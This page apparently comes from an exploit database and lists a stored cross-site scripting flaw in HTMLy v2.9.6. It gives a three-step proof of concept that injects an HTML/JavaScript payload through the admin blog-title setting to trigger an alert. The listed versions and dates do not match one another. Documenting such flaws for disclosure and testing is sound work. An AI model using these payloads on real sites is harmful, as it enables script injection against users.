[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

HTMLy Version v2.9.6 - Stored XSS Vulnerability

Author
tmrswrr
Risk
[
Security Risk Low
]
0day-ID
0day-ID-39545
Category
web applications
Date add
12-04-2024
Platform
php
# Exploit Title: HTMLy Version v2.9.6 - Stored XSS
# Exploit Author: tmrswrr 
# Vendor Homepage: https://www.htmly.com/
# Version 3.10.8.21 
# Date : 04/08/2024

1 ) Login admin https://127.0.0.1/HTMLy/admin/config
2 ) General Setting > Blog title >  "><img src=x onerrora=confirm() onerror=confirm(1)> 
3 ) After save it you will be see XSS alert

#  0day.today [2024-05-23]  #